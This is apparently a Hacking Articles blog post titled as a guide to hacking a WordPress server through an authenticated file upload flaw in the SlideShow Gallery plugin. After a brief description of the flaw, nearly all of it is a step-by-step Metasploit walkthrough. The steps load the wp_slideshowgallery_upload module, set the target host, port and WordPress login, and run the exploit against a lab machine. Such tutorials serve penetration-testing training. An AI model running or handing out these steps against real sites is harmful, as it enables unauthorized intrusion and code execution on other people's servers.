The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.
Exploit Targets
wordpress
Requirement
Attacker: kali Linux
Victim PC: WordPress
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit (wp_slideshowgallery_upload)>set targeturi /
msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload)>set rport 80
msf exploit (wp_slideshowgallery_upload)>set wp_user user
msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami
msf exploit (wp_slideshowgallery_upload)>exploit
The post Hack WordPress Server using WordPress SlideShow Gallery Authenticated File Upload appeared first on Hacking Articles.